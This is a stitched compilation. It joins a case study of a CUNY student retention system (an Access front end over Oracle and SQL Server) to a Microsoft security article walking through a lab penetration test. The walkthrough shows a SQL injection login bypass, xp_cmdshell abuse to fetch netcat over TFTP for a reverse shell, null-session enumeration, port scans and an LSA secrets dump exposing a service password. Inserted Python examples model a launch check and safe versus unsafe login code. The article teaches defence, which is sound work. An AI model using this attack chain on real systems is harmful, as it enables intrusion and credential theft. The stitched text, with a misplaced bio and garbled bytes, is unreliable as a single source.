The consultant would implement the student retention system in three phases. First, Lehman College would get its system in place, followed by Bronx Community College (BCC) in the second phase. Finally, the two colleges would be linked. The consultant turned to Microsoft technologies as a common baseline for each site, plugging them into the existing environment while allowing CUNY to avoid costly and disruptive changes to their infrastructure.

The Consultant:

ATSI, Adaptive Technology Solutions Inc. (www.a-tsi.com), is a software development and consulting firm specializing in collaborative applications. The company focuses on improving operations and communications by streamlining business processes. They specialize in administrative processes and centralized records storage in education, finance, telecommunications, and government.

Background:

The CUNY system is academically rich, but resources are extremely limited. The core student information system, which encompasses finance, course schedule, and student registration, resides on an IBM mainframe. What you see on the mainframe is what you get; new routines and reports are not feasible since Lehman College employs a single, desperately overworked mainframe programmer.

As the college and the diversity of its population grew over the years, educators found that individuals were getting lost in the system. There was no way to formally identify students needing assistance. The dropout rate was suspected to be higher in certain student populations, but this was difficult to measure.

A Title V grant opened up possibilities for Lehman College educators and administrators. New data beyond registration, financial aid, and grades could now be harnessed, so administrators went to work deciding what they would need to move ahead.

Since it would prove to be a problem incorporating all this data into the existing IBM mainframe, the ATSI project team decided that the new system would have to stand side-by-side with the IBM mainframe as a client-server application. Problems with the university's network security ended up ruling out the use of Web applications. The only workstation requirement on the client is that the operating system should be Windows 2000 or Windows XP.


How They Pulled It Off

The final goal at Lehman College is a student retention app called the Student Retention and Development System (SRDS) consisting of survey data, referrals data, long-range academic plans, advising tools, faculty data entry screens, and reporting. To take advantage of existing data, ATSI created a routine to populate the SRDS Oracle9i database with collected data that was stored on the mainframe. A translation table was created to give user-friendly meaning to those pesky mainframe number codes (56784 would now read "freshman," 980 would mean "English 101," to give a couple of examples).

On top of this translation layer, the ATSI project team developed a graphical user interface in Microsoft Access 2000 with Visual Basic for Applications (VBA) for scripting core and ActiveX control data objects as the data model.

Rather than attempt to re-key thousands of student records, ATSI leveraged the existing data for new purposes. Now the data is being exported for tasks such as ad hoc reporting, tracking, career counseling, faculty visits, surveys, and student intervention/dropout prevention programs.

So far, so good. After successful deployment of the Lehman College SRDS, ATSI created a customized version for Bronx Community College. The same interface was used, but here the back-end database was SQL Server 2000. SQL Server was chosen because it met or exceeded the functionality the project needed, and it had a lower total cost of ownership (BCC did not have an Oracle 9i administrator available).

Theresa Auricchio is President/Principal Consultant of AVI Consulting Inc. in New York state. She consults and speaks on e-business topics, and was recently appointed to the board of mm1Media. Reach Theresa at auricchio@aviconsulting.com.


The primary challenge at BCC arose when ATSI used SQL Server with Microsoft Access workgroup security. Within workgroup networking, shared resources and user information are unique to a specific computer and are unavailable to other computers. The administrator of a specific computer must maintain users, shares, and permissions at the local level, as opposed to using a centralized location where users and resources can be administered (like a Windows NT Server domain). While workgroup security has evolved over the years into a stable security account management tool, ATSI found recurring flaws in the security architecture where user accounts were habitually overwritten due to toggling between Access and SQL applications.

Since the colleges were using the same Access Security Workgroup for the entire university, user accounts were overwritten when toggling back and forth to other Access applications. While this can be controlled if login information is administered at the SQL Server level, in practice it wasn't because the IT department had no one serving as an applications administrator. Therefore, logins were managed by local admins as a Client Zone requirement. (Oracle accounts, on the other hand, are centrally managed by a database administrator in this site.)

Security Issues

There were several security challenges encountered during the system implementation. First, the university network was wide open and subject to constant hacking, making confidential student records vulnerable. Hacking at the university is pervasive. Student hackers have been able to access confidential files and in some instances alter the data. In other instances, hackers have covertly installed programs that recorded keystrokes as a means to gain access to user accounts and even inserted code into VBA files that corrupted data. ATSI learned about this house-of-cards network when they noticed that their security files kept disappearing. When a university VP was affected by this hacking, a firewall was finally installed.

Unfortunately, the new firewall was installed directly onto the network without testing, or even notifying the application developers, so network settings including the single Access Security Workgroup file shared by both colleges were set back to their defaults. Additionally, Microsoft VBA Security Update MS03-037 was installed, thwarting some hacks but also disabling some expected functionality.

At both Lehman and BCC, the general practice has been to rely upon Windows Authentication and the Access system workgroup default file for security in the login process for all SQL Server and Access apps. Not only are system security workgroups unmanaged, but this mixture of systems combined to cause a bigger problem: users who accessed different systems found that their account information (user name and password) was overwritten, making the system inaccessible to them.

This problem was discovered when troubleshooting one of the affected workstations. A review of the system properties revealed that the path of the security file had been altered to coincide with the system default file. This was fixed by modifying the application code to point to a different security file location, and then placing an SRDS application icon, pointing to the correct security file, on each user's desktop. Since Lehman and BCC did not employ any network management software, push technology, or imaging, ATSI ended up applying the fix on each workstation one at a time. Now, when the network infrastructure changes or implodes, the application will still work.

The original system was launched without any definition of user roles and permissions. When the project group launched the application, they had no idea how much it would open the lines of communication: almost too much, as it turned out.

The user team soon realized that they needed to define roles and permissions as an important part of the workflow. As an example, an economics professor should be able to update information about a student in her class, but not be able to see all the student's records.

The application was locked down after a review with the user team. The review resulted in advisors being linked only to their assigned students and faculty receiving access only to student records pertaining to their particular classes.

To secure the entire object model, developers set access at the account level, permissions on the object side, roles and privileges in Oracle, and workgroups in Access. Each entry made in the Access security file required matching accounts in Oracle and Access before the application would launch. A user account table was created to centrally store user information and active/inactive status. The system access process is coded so that if one entry in the table is off, the user is terminated without access to the application. This may have been the biggest step of all; if hackers break into the system at any point, they are now denied access to the application itself and can no longer alter its code.

Outcome

This project had a very happy conclusion as users have productively used this system for nine months and new functionality is being developed on top of the more secure framework that was put in place.

Legacy system data has been turned into information that the SRDS user community can build upon for their own student tracking and retention workflow and business processes. The application now functions well despite the dysfunctional network on which it resides. In an ideal environment, Access security workgroups would not be used for login security. Centrally located and administered applications would eliminate the kind of security file conflicts that were encountered by ATSI and the SRDS project team.

Because of improvements in workgroup security features in Access, the security requirements that used to require hard coding can now be performed by administrators. The ease of use is similar to that which SQL Server and Oracle offer. There are still some places where Access security should continue to improve. For instance, it is not easy to toggle between security files without hard coding. Perhaps an improvement will come in the form of a database property that would allow you to marry the application to the security file and then take it back to the system default without having to do it at individual workstations.
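The launch gate described under "Security Issues", as an added example rather than the SRDS project's own code: a language-neutral Python model of a fail-closed start-up check that refuses to run under the system default workgroup file and requires an active entry in the central account table plus matching Access and Oracle accounts. The file paths, store contents and user names are constructed for the illustration.

```python
"""Model of the SRDS launch gate described above (added example, not the project's
code): the application runs only when the workstation is using the expected Access
security (workgroup) file rather than the system default, and the user has an
active entry in the central account table plus matching accounts in both the
Access security file and the Oracle back end. All names and paths are constructed."""
from dataclasses import dataclass, field

EXPECTED_WORKGROUP = r"\\srds-share\secure\srds.mdw"   # constructed: the app's own file
SYSTEM_DEFAULT = r"C:\Windows\system.mdw"              # what a reset workstation falls back to


@dataclass
class Environment:
    workgroup_file: str                 # security file the workstation is actually using
    access_users: set                   # accounts present in the Access security file
    oracle_users: set                   # accounts present in the Oracle back end
    account_table: dict = field(default_factory=dict)   # central table: user -> active?


def launch_decision(env, user):
    """Fail closed: the first failed check denies launch and names the reason for
    the administrator. Anything not consistent across all three stores is 'off'."""
    wg = env.workgroup_file.lower()
    if wg == SYSTEM_DEFAULT.lower():
        return False, "workstation was reset to the system default workgroup file"
    if wg != EXPECTED_WORKGROUP.lower():
        return False, f"unexpected workgroup file: {env.workgroup_file}"
    if user not in env.account_table:
        return False, f"{user}: no entry in the central account table"
    if not env.account_table[user]:
        return False, f"{user}: marked inactive"
    missing = [name for name, store in (("Access", env.access_users), ("Oracle", env.oracle_users))
               if user not in store]
    if missing:
        return False, f"{user}: no matching account in {', '.join(missing)}"
    return True, "ok"


def demo():
    """Constructed site: a healthy workstation and one reset by the firewall install."""
    good = Environment(
        EXPECTED_WORKGROUP,
        {"advisor1", "prof_econ", "prof_hist", "olduser"},          # Access security file
        {"advisor1", "prof_econ"},                                   # Oracle accounts
        {"advisor1": True, "prof_econ": True, "prof_hist": True, "olduser": False},
    )
    reset = Environment(SYSTEM_DEFAULT, good.access_users, good.oracle_users, good.account_table)
    return {
        "advisor_ok": launch_decision(good, "advisor1"),
        "inactive": launch_decision(good, "olduser"),
        "unknown": launch_decision(good, "stranger"),
        "half_provisioned": launch_decision(good, "prof_hist"),
        "after_reset": launch_decision(reset, "advisor1"),
    }


if __name__ == "__main__":
    for case, (allowed, reason) in demo().items():
        print(f"{case:17} {'LAUNCH' if allowed else 'DENY  '} {reason}")
```

The reason string is for the administrator's log; the user should see only that launch was denied, so that an account half-created in one store does not tell anyone which store is missing it.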


Hacking: Fight Back

How a Criminal Might Infiltrate Your Network

Jesper Johansson

AT A GLANCE

- Paths hackers can use to infiltrate networks
- What patching and version states reveal
- IIS and SQL injection attacks
- The dangers of elevated privileges

Jesper Johansson is a Security Program Manager with Microsoft, focusing on how customers should best deploy Microsoft products more securely. He has a Ph.D. in MIS and has delivered speeches on security at conferences all over the world.

This article is an excerpt from an upcoming book by Jesper Johansson and Steve Riley.

One of the great mysteries in security management is the modus operandi of criminal hackers. If you don't know how they can attack you, how can you protect yourself from them? Prepare to be enlightened.

This article is not intended to show you how to hack something, but rather to show how attackers can take advantage of your mistakes. This will enable you to avoid the common pitfalls that criminal hackers exploit.

Before I get started, there are several things you need to know about penetration testing. First of all, a penetration test gone wrong can have dire consequences for the stability of your network. Some of the tools used by hackers (criminal and otherwise) are designed to probe a network for vulnerabilities. Hacking tools and exploits used against a system can go wrong, destabilize a system or the entire network, or have other unintended consequences. A professional knows where to draw the line and how far she can push the network without breaking it. An amateur usually does not.

A healthy infusion of paranoia tends to be remarkably useful when protecting networks. One of the worst mistakes a security administrator can make is to assume everything is OK. Be aware of the mythical "your network is secure" statement. With alarming frequency, security consultants will leave you with a report that claims that your network is secure, based on the fact that they were unable to get into anything. This certainly does not mean your network is secure! It only means they couldn't find a way to break it, but someone else still could.


Target Network

Most networks today are built on what is called the eggshell principle: hard on the outside and soft on the inside. This means that if an attacker can gain a foothold onto the network, the rest of the network will usually fall like dominoes. Once inside, the most difficult part is often to figure out what to attack next and where to go for the really juicy bits of information. It does not have to be this way. With the proper techniques, we as network administrators can achieve two crucial objectives: to make it much more difficult to gain a foothold in the first place and to make it much more difficult to use that foothold to get anywhere else on the network.

Before I start attacking the target network, let's take a look at what I'm up against. Obviously, a real attacker going after a real network would rarely have access to complete network diagrams, but in my case it is enlightening to look at the configuration of the target network (see Figure 1).

As Figure 1 shows, my target network is a standard dual-screened subnet with a firewall at the front and at the back. The perimeter network has a pretty common setup with a front-end Web server, a back-end database server, and a demilitarized zone (DMZ) domain controller (DC). There is a corporate DC on the back end, and the attacker's end goal is to take control of that DC.

Perhaps the only unusual aspect of this network is the fact that the Web server and the DMZ DC are both serving as routers. This is actually an artifact of how this scenario was constructed. The network in question was built as virtual machines running in Microsoft Virtual PC 2004 so that I can carry the network with me and use it for demonstrations. Realistically, I can only run two virtual machines per host computer. To run the entire network I need half as many hosts as I need guests. Had I built this with separate routers I would have needed three laptops (or one more than I'd ever want to carry). To that end, the Web server and DMZ DC are both serving as routers to reduce the number of host machines needed. I assure you, this somewhat unorthodox configuration has no bearing on what is to come.

Figure 1 Target Network (diagram; labels recovered: Internet, Firewall, Web Server, 192.168.2.30, 172.17.0.1)

The first step in hacking any network is to figure out what to attack, that is, to develop a footprint of the target network. Some of the things it is useful for a criminal hacker to learn include:

- Network address ranges
- Host names
- Exposed hosts
- Applications exposed on those hosts
- Operating system and application version information
- Patch state of both the host and of the applications
- Structure of the applications and back-end servers

So let's take a look at what kinds of information an attacker can obtain and learn how the typical hacker can find that important information.

Network Address Ranges and Host Names

The next step in a good hack is to find the logical locations for the networks of interest. Say I'm performing a penetration test of contoso.com. I would start out by looking up what networks are registered to contoso.com. Perhaps even more interesting than the publicly registered address ranges for contoso.com is any information on networks connected to the target network, such as an extranet or a business partner. It's often easier to attack poor-security.com and take over that domain before jumping from there to contoso.com. Like links in a chain, a network is only as secure as the least secure network connected to it (including all the VPN users connecting into it).

The next thing the attacker needs is host names. In some cases, it is possible to perform nslookup requests on large swaths of the network and it may even be possible to perform something called a zone transfer. A zone transfer is simply a request to a DNS server to send back a copy of an entire DNS zone (a listing of all the registered names in the network). While host names are not critically important to most attacks, they can make an attack much simpler. For example, if you have the hostname of a Web server running IIS, you can deduce the anonymous IIS account for that host, since it is usually called IUSR_hostname. Now let's assume that the administrator has configured account lockout on that system. All an attacker has to do to take down that Web server is to send a large number of requests to the server asking it to authenticate you as IUSR_hostname. In short order the attacker can send enough bad passwords to lock out the anonymous user account. Once that account is locked out, the attacker can just keep sending enough bad requests to keep it that way and this Web server will no longer serve anything to anyone.


More interesting than host names are the hosts that are actually exposed. In this phase of the attack, I am trying to locate easy targets. Doing so may be absolutely trivial. You may not even need any hacking tools, as long as Internet Control Message Protocol (ICMP) traffic is not blocked at the border. In that case, the following command is perfectly sufficient:

c:\>discoverHosts 192.168.2
192.168.2.30

Obviously, the IP address at the end would need to be adjusted to the appropriate target range. All I am doing here, however, is sending an ICMP echo to each host on a particular network. If ICMP traffic is not blocked, you just sit back while your network generates a list of valid addresses.

In the vast majority of cases, ICMP traffic should be sent to /dev/null at the border. Even a half decent firewall should block ICMP, but it is surprising how often administrators forget to ensure that it is actually disabled. No response should even be sent. While this does not really stop enumeration, it makes it marginally more difficult since the attacker needs to rely on custom tools, such as port scanners.

A port scanner is simply a tool that attempts to connect to a target and report whether it was successful or not. A successful connection means the host is listening. An unsuccessful connection usually means it is not. The most common type of port scan is known as a SYN scan, where the attacker attempts to establish an ordinary connection to the target. If a host is listening, the connection will be successful and the port scanner will notify the attacker that a port is open. You can port scan an entire network in short order. Doing so on a range of well-chosen ports can give you a tremendous amount of information about what is available on the network.

Port scanning is the way to determine what applications are exposed on a host. This allows us to get information on possible vectors for attack. Some of the applications commonly looked for include the FTP clients and servers, Telnet, mail servers, and HTTP Web servers.


If you can, it is very useful to get information on the version of the applications that we find running on a target machine. For example, many applications have some kind of banner that is sent as soon as someone connects. Most SMTP and POP servers as well as many Web servers are configured to do this. In our case, however, the target network is running IIS 6.0 on Windows Server 2003, and IIS 6.0 does not send a banner with any usable info.

It is also very interesting to an attacker to find out what patch state the exposed servers are in. This information can be found in a variety of ways. In some cases, the banners presented by the applications will tell you all you need to know. For example, sendmail banners usually tell you the version number of the daemon. If you know which version of sendmail still exposes certain vulnerabilities, you have all the information you need. In other cases, you can figure out whether it has a particular patch or not from the responses the system is giving you. This is essentially the technique used in good vulnerability scanners and in OS fingerprinting tools. As a last resort, you can always fire off an exploit against a system and see what happens. This is often how vulnerability scanners look for denial of service attacks. If the system still responds after the attack it was most likely not vulnerable!

It is often very helpful to get information about the structure of the application and back-end server(s), if any. This is usually very difficult, but in some cases you luck out. For example, let's assume you have a target network that uses a particular third-party Web application with very distinct file names and page designs. In this case, it is often obvious to the attacker which application you are using. If the attacker is familiar with the application, she may know how to exploit it. For instance, the application may use a configuration file called %webroot%\system.config. If files with the .config extension are not parsed by the Web server, the attacker can simply request this file in a Web browser. In a best-case scenario, that file will only give her information such as the names of the back-end servers and databases. In the worst-case scenario, that file will contain the user name and password used to actually establish the connection between the Web server and a database server.


Winter 2005 27 




Figure 2 Contoso.com Homepage (login form reading "Welcome to the pubs ordering system. You must login to start", with Username and Password fields)


Do not dismiss this as a contrived example. I encountered this exact situation just a few months ago as I was looking at a customer's network to see whether there was anything at all that could be done to improve security. A very large number of commercial Web applications are extremely poorly written, essentially turning them into backdoors into the network.

At this point, I have just about all the information I need to start hacking. The first step is to establish an initial foothold into the network, to pierce the eggshell, if you will.


Initial Compromise
Let's assume I've done some initial probing and know that the target network is fully patched and that there is a really tight firewall in front, only allowing traffic on ports 80 and 443 (the defaults for HTTP and HTTPS); where do I go from here? Remember what I said about backdoors. Where could the backdoor be? What am I up against? The first step is to look at what is exposed to me: a Web application. Figure 2 shows the Web server homepage. From this screen, I can tell that this is obviously an ordering site of some kind. Let's use a legitimate account to find out more about it.

The next page shows the Pubs bookstore and lists books for sale. They display my username on the page. This could come in handy if they are not careful, because I can use it to validate certain other techniques. For example, I have a hunch that this site uses a pretty poor algorithm for checking whether users have entered the right username or password (pretty shrewd, considering I wrote the algorithm!). I am also curious whether they are properly validating the input from the username fields. To find out for sure, I'm going to use a technique called SQL injection. Using a SQL injection attack, I pass the following string

foo' OR 1=1;--

in the username field. This yields the result shown in Figure 3.

In Figure 3, you can see that not only do I get logged on, but the application also displayed the fake username I sent it on the homepage. This latter artifact is actually a separate type of vulnerability known as a cross-site scripting (CSS) vulnerability, where the user input is echoed directly to the screen without sanitizing it first.




So how was I logged on? There obviously isn't a user called foo' OR 1=1;--. The application is very poorly written. It assumes that if any results come back from the database when it asks for a user with a particular password, then the username and password combination is obviously valid, and therefore it should log on this user. The SQL injection attack effectively rewrote the database query to include the statement OR 1=1. Since 1 is always equal to 1, this evaluates to true, which means the entire query evaluates to true for all records in the database. This will return every user account in the database, which means the application thought I was logged on.

I can now send arbitrary commands to the back-end database server. I am going to use that capability in an elevation of privilege attack to get the database server to run commands for me.
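The flawed login check described above, beside a hardened version that rejects the same input and escapes the username before echoing it. This is an added example, not code from the article: Python with sqlite3 standing in for SQL Server, and the users table, the account alice/s3cret and the PBKDF2 settings are constructed for the demonstration.

```python
import hashlib
import hmac
import html
import os
import sqlite3

# The exact string the article passes in the username field.
INJECTED_USERNAME = "foo' OR 1=1;--"


def _hash_password(password: str, salt: bytes) -> bytes:
    # PBKDF2-HMAC-SHA256; the iteration count is a constructed value for this example.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the pubs ordering system's user table (one account)."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT, "
        "salt BLOB, pw_hash BLOB)"
    )
    salt = os.urandom(16)
    db.execute(
        "INSERT INTO users VALUES (?, ?, ?, ?)",
        ("alice", "s3cret", salt, _hash_password("s3cret", salt)),
    )
    db.commit()
    return db


def vulnerable_login(db: sqlite3.Connection, username: str, password: str):
    """The article's check: concatenate input into SQL, treat 'any rows' as success.

    With the injected username the WHERE clause becomes
    username = 'foo' OR 1=1;--' AND password = '...'
    so every user row comes back and the caller is 'logged on'.
    """
    query = (
        "SELECT username FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    rows = db.execute(query).fetchall()
    # Echoes the submitted name back, which is also the XSS the article points out.
    return username if rows else None


def safe_login(db: sqlite3.Connection, username: str, password: str):
    """Hardened check: parameterized lookup, then a constant-time hash comparison."""
    row = db.execute(
        "SELECT salt, pw_hash FROM users WHERE username = ?", (username,)
    ).fetchone()
    if row is None:
        return None
    salt, stored = row
    if not hmac.compare_digest(stored, _hash_password(password, salt)):
        return None
    return username


def render_greeting(username: str) -> str:
    """Escape before echoing user input into the page."""
    return "Welcome, " + html.escape(username, quote=True)


if __name__ == "__main__":
    conn = make_db()
    print("vulnerable:", vulnerable_login(conn, INJECTED_USERNAME, "x"))  # logged on
    print("hardened:  ", safe_login(conn, INJECTED_USERNAME, "x"))        # None
    print(render_greeting(INJECTED_USERNAME))
```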


Elevating Privileges

As you saw earlier, the database server is not directly accessible from the Internet, and the front-end Web server is fully patched and not vulnerable to any known attacks. The objective at this point is to elevate my privileges so that I become an internal user, preferably a highly privileged one, on one of the systems in the target network. To do that, I'll use SQL injection to send commands to the database server and


Figure 3 SQL Injection (and Cross-Site Scripting) at Work (screenshot of the "Available Titles" page listing the pubs bookstore titles, prices and authors)

ask it to do things for us. Note that I cannot connect directly to the database server, so instead I will ask it to make a connection to me. I'll begin by setting up a listener on the external network, and then I will make the database server connect to me.

Before I can command the database server, I need to get some tools onto the Web server to further the attack. This is important because, generally speaking, hacking tools are not installed on the operating system by default. To get them up there you can use Trivial File Transfer Protocol (TFTP), a connectionless protocol used primarily for booting diskless workstations. The client application for TFTP is installed on all Windows systems by default (with the exception of Windows Server 2003 Service Pack 1 and later), so unless you have removed it, it is still there and available. Since I have a SQL injection vulnerability, I can use it to command the database server to use TFTP to download netcat to the database server. Netcat is a network tool somewhat like telnet, except that it is unauthenticated and much more versatile. It is freely available on the Internet and even comes standard on many UNIX and Linux distributions. It is pretty much universally used by attackers, however, and should never be left on a system where it is not absolutely needed.

The attack works by calling the xp_cmdshell stored procedure. Installed by default on SQL Server, xp_cmdshell is used to execute commands on the underlying operating system. I will simply use this procedure to run TFTP and upload my tools to the database. xp_cmdshell is rarely needed in most deployments and can be disabled in several ways to protect against exactly this kind of attack. Once I've uploaded netcat, I tell netcat to create a socket, and then I pass that socket as stdin, stdout, and stderr in a call to cmd.exe. This sounds complicated, but it works reliably. The result is an outbound connection where I pipe a command shell over a socket. I now have my remote command line:

c:\>nc -l -p 12345
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>hostname
hostname
PYN-SQL

At this point, I have established my first foothold and am well on the way to taking over the network. I have escalated privileges from a remote anonymous user to an inside user. To find out what kind of user, I need to first get the rest of my tools onto the system. Those tools will be used to escalate local privileges if needed as well as to hack the rest of the systems on the network. I can transfer those, too, using tftp.exe. Once I've done that, I can verify my credentials on the host:

C:\warez>whoami
whoami
NT AUTHORITY\SYSTEM

Bingo! I'm already LocalSystem. That must certainly mean that SQL Server ran xp_cmdshell as LocalSystem, and that I have completely compromised the back-end database server. I can now proceed to hacking other machines on the network.

Hacking Other Machines
I have now pierced the eggshell. At this point, the objective is to fully "own" the network and take over everything else. Before I really get going, let's get some more information on my target using the dumpinfo utility, shown in Figure 4. dumpinfo is a custom tool that enumerates information from a system over a null session. A null session is an anonymous connection, one made without any authentication. From this I can learn that there is not much on this system; it looks rather like a default system. Before I proceed with using this information, let's figure out the lay of the land. Shown in Figure 5, invoking ipconfig.exe tells me my IP address and configuration. Notice that the machine has a private address so my connection must be going through a NAT router at 172.17.0.1. This information will also be useful later. Now, let's get hacking again.

Figure 4 Localhost Dumpinfo

C:\warez>dumpinfo 127.0.0.1
The Administrator is: PYN-SQL\Administrator

Users on PYN-SQL:

RID 1000 PYN-SQL\TsInternetUser a User
RID 1001 PYN-SQL\SQLDebugger a User
Share Type Comment

IPC$ Unknown Remote IPC
ADMIN$ Special Remote Admin
C$ Special Default share
Administrators:

PYN-SQL\Administrator
PYN-DMZ\_ids
PYN-DMZ\Domain Admins

Figure 5 Ipconfig Output for PYN-SQL

C:\warez>ipconfig /all

Windows 2000 IP Configuration

Host Name . . . . . . . . . . . . : PYN-SQL
Primary DNS Suffix  . . . . . . . : PYN-DMZ.LOCAL
Node Type . . . . . . . . . . . . : Mixed
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : PYN-DMZ.LOCAL

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix  . :
Description . . . . . . . . . . . : Intel 21140 Based PCI Fast Ethernet Adapter
Physical Address. . . . . . . . . : 00-03-FF-03-3E-F0
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : 172.17.0.3
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 172.17.0.1
DNS Servers . . . . . . . . . . . : 172.17.0.2

The first thing the attacker does now is look for the easy exploits. Perhaps the simplest is to use shared service accounts, if present. Shared service accounts are an easy vector because the easiest way to configure services on multiple systems is to use domain accounts to run those services under, and then configure services on many systems to run with the same accounts. Alternatively, in some environments, local accounts are used, but the credentials match those on other systems. This means that if we find any services running in regular user accounts (as opposed to system accounts such as LocalSystem, NetworkService, and LocalService) it's likely that they are used on multiple systems.

Figure 6 Listing Local Admins

C:\warez>net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain.

Members

Administrator
PYN-DMZ\Domain Admins
PYN-SQL\Administrator
PYN-DMZ\_ids
The command completed successfully.

The _ids account is a domain account, and it is a local administrator.

To find out whether this is a viable vector, let's check who is running services on the database server I am on. To do that, I use a tool designed for that purpose:

C:\warez>serviceuser \\PYN-SQL
IDS PYN-DMZ\_ids

As you can see, there is a domain account used for the IDS service (presumably the Intrusion Detection Service). To find out whether it is truly useful, let's learn more about the account using the net command. You can see the output in Figure 6.


Figure 7 Lsadump Output

C:\warez>lsadump2

$MACHINE.ACC
13 FE 4C 3A 04 F8 1F 94 75 C8 9B 0B 1C 35 45 7A
52 7E 25 DF F8 17 F2 96 3A 35 81 C7
DefaultPassword

DPAPI_SYSTEM
01 00 00 00 C8 AA F8 8C 36 C7 69 CC DD 42 CB 15
3F 4£ 07 6D 48 05 0A 4C FE 31 87 C9 F2 58 A3 AD
B7 AD 13 20 26 11 24 24 FF 79 AE D3

SC_IDS
69 00 64 00 73 00 50 00 61 00 73 00 73 00 77 00
64 00 21 00




It would of course be preferable if this was a domain account, but I'll take what I can get. To understand what you can do with this account, you need to know a little more about how Windows operates. Services are applications that run when the system boots. Just like any other process on the system, services must run under some kind of user identity. When the service starts, the operating system will authenticate the account used for the service. To do this, it needs a username and password, which is stored in the Local Security Authority (LSA) Secrets. The LSA Secrets are maintained by the LSA to hold certain sensitive information, such as the computer account credentials, encryption keys, and service account credentials.

The LSA Secrets are encrypted on disk and decrypted by the OS when the machine boots. They are then held in clear text in the LSA process memory space while the system is running. To get at this information, the hacker must hook a debugger to the LSA process. That may sound daunting, but there are utilities designed specifically for this purpose. Note that the LSA is running as LocalSystem, so not just anyone can attach a debugger to a process running as LocalSystem. Doing so would be a serious security breach and violate all kinds of security models. However, any user who has the SeDebugPrivilege can do so. By default, this means only the Administrators are able. Since Administrators can do whatever they want anyway, this is not a security problem. They own the system without that privilege, and can grant themselves the privilege if they want. The problem comes when untrusted users have that privilege. In my case, I don't have to worry about that because my remote shell is running as LocalSystem. In other words, I am running as the same identity as the LSA process, and therefore have the right to attach a debugger to it, whether I have the privilege or not.

The output of running Lsadump, shown in Figure 7, has been truncated to make it easier to read, but the really interesting piece is right at the end, where the service account credentials are listed. As you can see, the right-hand column holds the service account password. I now know that there is a user called _ids, and that it has a password of "idsPasswd!" (the output is in Unicode, hence the dots in between, signifying nulls). The only thing left now is to find out where to use this account. By pinging all the hosts on the subnet, I find that there are only two other machines on this subnet, 172.17.0.1 (the gateway) and 172.17.0.2 (the DNS server). I suppose I should figure out a little bit more about each of them. To do that, I use dumpinfo again. By default, some Windows systems give out more information than others over a null session. Figure 8 shows some typical information. I'm not getting very much info on this system because it is a Windows Server 2003 member server. Note that on Windows Server 2003 standalone and member servers, null session users will only be able to list the shares on the system, not the user accounts by default. You can tell from the dumpinfo output, however, that the default gateway is running a Web server, based on the fact that it exposes a wwwroot$ share. Notice that I do get a list of all the so-called hidden shares (shares postfixed with a $).

Figure 8 Gateway Dumpinfo

C:\warez>dumpinfo 172.17.0.1

Unable to look up the local administrator
Unable to enumerate users because I could not get the Admin Sid

Share Type Comment

IPC$ Unknown Remote IPC
ADMIN$ Special Remote Admin
wwwroot$ Disk
C$ Special Default share
Administrators:

Unable to enumerate administrators
ERROR: Access Denied




Figure 9 DNS Server Dumpinfo

C:\warez>dumpinfo 172.17.0.2
The Administrator is: PYN-DMZ\Administrator

Users on PYN-DMZ-DC:

RID 1000 PYN-DMZ\HelpServicesGroup an Alias
RID 1001 PYN-DMZ\SUPPORT_388945a0 a User
RID 1002 PYN-DMZ\TelnetClients an Alias
RID 1003 PYN-DMZ\PYN-DMZ-DC$ a User
RID 1104 PYN-DMZ\DnsAdmins an Alias
RID 1105 PYN-DMZ\DnsUpdateProxy a Group
RID 1106 PYN-DMZ\FAjenstat a User
RID 1107 PYN-DMZ\AAlberts a User
RID 1108 PYN-DMZ\HAcevedo a User
RID 1109 PYN-DMZ\MAlexander a User
RID 1110 PYN-DMZ\KAkers a User
RID 1111 PYN-DMZ\TAdams a User
RID 1112 PYN-DMZ\KAbercrombie a User
RID 1113 PYN-DMZ\Sculp a User
RID 1114 PYN-DMZ\SAbbas a User
RID 1115 PYN-DMZ\MAllen a User
RID 1116 PYN-DMZ\JAdams a User
RID 1117 PYN-DMZ\SAlexander a User
RID 1118 PYN-DMZ\HAbolrous a User
RID 1119 PYN-DMZ\PAckerman a User
RID 1120 PYN-DMZ\GAlderson a User
RID 1121 PYN-DMZ\PYN-SQL$ a User
RID 1122 PYN-DMZ\PYN-WEB$ a User
RID 1123 PYN-DMZ\_IDS a User
Share Type Comment

IPC$ Unknown Remote IPC
NETLOGON Disk Logon server share
ADMIN$ Special Remote Admin
SYSVOL Disk Logon server share
C$ Special Default share

Administrators:
Unable to enumerate administrators
ERROR: Access Denied


The dollar sign is just a notification to the client-side of the API not to display this item. The dumpinfo tool ignores that notification and displays the item anyway.

It would also be helpful to find out what services are available on this system. This information will tell you the type of connections that you can make to it. To do that, let's turn to the portscanner:


C:\warez>portscan 172.17.0.1
Port 172.17.0.1:80 open
Port 172.17.0.1:135 open
Port 172.17.0.1:139 open
Port 172.17.0.1:445 open
Port 172.17.0.1:3389 open


This really doesn't tell me much, but it does verify that I am allowed to make SMB (ports 139 and 445) and Terminal Services connections (port 3389) to the gateway/Web server. This will be highly useful for furthering the attack in just a moment.

For now, let's take a closer look at the other system on the network, whose dumpinfo results are shown in Figure 9.


The machine must be a domain controller because the account domains are PYN-DMZ but the hostname is PYN-DMZ-DC. By default, Windows Server 2003 DCs are configured for down-level compatibility. They let anonymous users access all information except for the list of users who are administrators. For completeness, we can also do a port scan:

C:\warez>portscan 172.17.0.2
Port 172.17.0.2:53 open
Port 172.17.0.2:135 open
Port 172.17.0.2:139 open
Port 172.17.0.2:389 open
Port 172.17.0.2:445 open
Port 172.17.0.2:3268 open

Since port 3268 is listening, this must be a Global Catalog server for the forest. This means that 172.17.0.2 is a highly valuable target. Interestingly, this system does not have Terminal Services enabled.

I still do not know where the _ids account is used, so I'll just have to try it. There is no point in trying it on the DC since I know there is no account there with that name, so I try it on the Web server. Before I can do that, I need the hostname on the Web server. For this I use a custom tool, GetSystemInfo:


C:\warez>GetSystemInfo 172.17.0.1
Server info on 172.17.0.1

Name: PYN-WEB
Domain: PYN-DMZ
Version: 5.2
